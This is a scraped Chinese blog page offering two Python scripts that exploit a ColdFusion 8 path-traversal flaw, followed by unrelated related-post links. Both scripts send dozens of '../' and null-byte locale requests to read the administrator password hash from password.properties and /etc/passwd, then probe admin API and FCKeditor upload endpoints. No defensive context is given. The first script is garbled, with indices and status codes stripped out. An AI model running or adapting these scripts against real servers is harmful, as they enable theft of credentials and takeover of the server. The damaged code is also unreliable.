Coldfusion8 读取HASH工具
#!/usr/bin/env python
#-*- coding:utf- -*-
import sys
import threading
import urllib
import httplib
class Mythread(threading.Thread):
def __init__(self,host):
threading.Thread.__init__(self)
self.host = host
def run(self):
urls = ['/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\etc\passwd%00en']
try:
for path in urls:
out = urllib.urlopen(self.host + path).read().split(r'</title>')[].split(r'<title>')[].replace(r'rdspassword=', '\n').replace(r'encrypted=true', '\n')
print out
except Exception:
print "Error connect time"
self.scanner()
def scanner(self):
#self.host = host
cfmfck = ['/CFIDE/adminapi/_datasource/formatjdbcurl.cfm',
'/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm',
'/CFIDE/adminapi/_datasource/geturldefaults.cfm',
'/CFIDE/adminapi/_datasource/setdsn.cfm',
'/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm',
'/CFIDE/adminapi/_datasource/setsldatasource.cfm',
'/CFIDE/adminapi/customtags/l10n.cfm',
'/CFIDE/debug/cf_debugFr.cfm',
'/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm'] i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5","Accept": "text/plain"} for fckpath in cfmfck:
if self.host[:] == "https://":
conn = httplib.HTTPSConnection(self.host.replace("https://",""))
else:
conn = httplib.HTTPConnection(self.host.replace("http://",""))
conn.request('GET',fckpath,headers = i_headers)
r1 = conn.getresponse() if r1.status == or r1.status == or r1.status == :
print self.host + fckpath + " " + str(r1.status) if __name__ == "__main__":
Mythread(sys.argv[]).start()
#!/usr/bin/env python
# -*- coding: utf8 -*-
import sys , urllib , httplib , subprocess
def banner():
print """
#--------------------------------------------------#
# Welcome to www.90sec.org #
# THis is read ColdFusion sha1 Tool #
# python COldFusion.py www.WebSite.cn #
#--------------------------------------------------#
"""
urls = ['/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\etc\passwd%00en'] cfmfck = ['/CFIDE/adminapi/_datasource/formatjdbcurl.cfm','/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm','/CFIDE/adminapi/_datasource/geturldefaults.cfm','/CFIDE/adminapi/_datasource/setdsn.cfm','/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm','/CFIDE/adminapi/_datasource/setsldatasource.cfm','/CFIDE/adminapi/customtags/l10n.cfm','/CFIDE/debug/cf_debugFr.cfm','/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm']
try:
host = sys.argv[1]
if len(host) < '':
banner()
for url in urls:
context = urllib.urlopen(host + url).read()
out = context.split(r'</title>')[0].split(r'<title>')[1].replace(r'rdspassword=', '\n').replace(r'encrypted=true', '\n')
print out except Exception:
banner()
sys.exit() else:
for line in cfmfck:
host = host.replace("http://","")
line = line.replace("\n","")
line = "/" + line
website = host + line
connection = httplib.HTTPConnection(host)
connection.request("GET",line)
response = connection.getresponse()
if response.status == 200:
print website , ''
elif response.status == 403:
print website , ''
elif response.status == 500:
print website , 'server ERROR'
Coldfusion8 读取HASH工具的更多相关文章
- Redis操作Hash工具类封装,Redis工具类封装
Redis操作Hash工具类封装,Redis工具类封装 >>>>>>>>>>>>>>>>>> ...
- Hash工具下载地址
因为经常要在非常用电脑使用,这里放一个链接,方便下载: http://files.cnblogs.com/files/cxun/Hash.zip HASH计算工具,可计算MD5.SHA-1.CRC32 ...
- POI读取excel工具类 返回实体bean集合(xls,xlsx通用)
本文举个简单的实例 读取上图的 excel文件到 List<User>集合 首先 导入POi 相关 jar包 在pom.xml 加入 <!-- poi --> <depe ...
- .NET Core 常用加密和Hash工具NETCore.Encrypt
前言 在日常开发过程中,不可避免的涉及到数据加密解密(Hash)操作,所以就有想法开发通用工具,NETCore.Encrypt就诞生了.目前NETCore.Encrypt只支持.NET Core ,工 ...
- poi读取excel工具类
package com.manage.utils; import ch.qos.logback.core.net.SyslogOutputStream; import com.google.gson. ...
- 读取配置文件工具demo
//读取配置文件public class ResourcesUtils { /* * @description:根据属性获取文件名 * * @param:propertyName文件的属性名 * * ...
- 【工具】读取proprtties工具类
获取properties内容: 基本的使用看网络上大多是这样的,使用时注意线程安全以及读写的实时性问题. 1.直接通过流读取(反射): InputStream inStream = this.get ...
- meterpreter读取hash明文记录
今天测试某个站点时读hash老出错 这里做下读hash的笔记 进去meterpreter后getuid一 1 2 meterpreter > getuid Server username: NT ...
- PropertiesUtil 读取配置文件工具类
package org.konghao.basic.util; import java.io.FileInputStream; import java.io.FileNotFoundException ...
随机推荐
- 将Android studio的工程导入到eclipse中
自从Android Studio(后面称AS)推出后,越来越多的项目都使用AS开发. AS往eclipse迁移的方法: 其实很简单,代码都是一样的,从AS工程中找到与Eclipse工程对应的文件,放到 ...
- 转!!Tomcat网站上的core和deployer的区别
转自:https://www.cnblogs.com/guxia/p/6678184.html 8.5.13 Please see the README file for packaging info ...
- Python--(并发编程之线程Part2)
GIL只能保证垃圾回收机制的安全,进程中的数据安全还是需要自定义锁 线程执行代码首先要抢到GIL全局锁,假设线程X首先抢到,以为要抢到自定义锁要执行代码,所以这个线程在执行代码的时候就很容抢到了自定义 ...
- Django组件 - cookie、session、用户认证组件
一.cookie 1.会话跟踪技术 1)什么是会话跟踪技术 我们需要先了解一下什么是会话!可以把会话理解为客户端与服务器之间的一次会晤,在一次会晤中可能会包含多次请求和响应.例如你给10086打个电话 ...
- 查找至少连续出现三次的所有数字/连续3天的日期【LeetCode】
编写一个SQL查询,查找至少连续出现三次的所有数字.+----+-----+ | Id | Num | +----+-----+ | 1 | 1 | | 2 | 1 | | 3 | 1 | | 4 | ...
- JQuery操作select中的option
html页面代码例如以下: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http ...
- html当前文档的状态
<script type="text/javascript"> document.onreadystatechange = loadingChange;//当页面加载状 ...
- 吴超老师课程--HBASE的查询手机项目
查询1.按RowKey查询2.按手机号码查询3.按手机号码的区域查询 //查询手机13450456688的所有上网记录 public static void scan(String tableName ...
- XMPP环境搭建 (mac环境下 安装自己独立的mysql与服务器(openfire),实现即时聊天功能)
1简单概览 [一]XMPP简介 http://xmpp.org 即时通讯技术 IM - Instant Messaging ⽀支持⽤用户在线实时交谈.交谈双⽅方都需要⼀一个聊天窗⼝口,其中⼀一个⽤用户 ...
- python全栈开发从入门到放弃之网络基础
一.操作系统基础 操作系统:(Operating System,简称OS)是管理和控制计算机硬件与软件资源的计算机程序,是直接运行在“裸机”上的最基本的系统软件,任何其他软件都必须在操作系统的支持下才 ...